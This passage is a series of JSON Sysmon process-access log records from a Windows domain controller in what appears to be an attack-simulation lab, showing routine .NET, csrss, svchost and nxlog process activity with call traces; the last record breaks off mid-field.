{"EventTime":"2020-08-01 06:59:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7084,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:55.165\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12EB-5F25-0000-00102C5A0A00}\r\nTargetProcessId: 4480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:55.165","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12EB-5F25-0000-00102C5A0A00}","TargetProcessId":"4480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7085,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:55.165\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12EB-5F25-0000-00102C5A0A00}\r\nTargetProcessId: 4480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:55.165","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12EB-5F25-0000-00102C5A0A00}","TargetProcessId":"4480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7086,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:55.181\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12EB-5F25-0000-00102C5A0A00}\r\nTargetProcessId: 4480\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:55.181","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12EB-5F25-0000-00102C5A0A00}","TargetProcessId":"4480","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7087,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:55.243\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12EB-5F25-0000-0010585D0A00}\r\nTargetProcessId: 3028\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:55.243","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12EB-5F25-0000-0010585D0A00}","TargetProcessId":"3028","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7088,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:55.243\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12EB-5F25-0000-0010585D0A00}\r\nTargetProcessId: 3028\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:55.243","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12EB-5F25-0000-0010585D0A00}","TargetProcessId":"3028","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7089,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:55.243\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12EB-5F25-0000-0010585D0A00}\r\nTargetProcessId: 3028\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:55.243","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12EB-5F25-0000-0010585D0A00}","TargetProcessId":"3028","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7090,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:55.556\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:55.556","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7091,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:56.556\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:56.556","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files 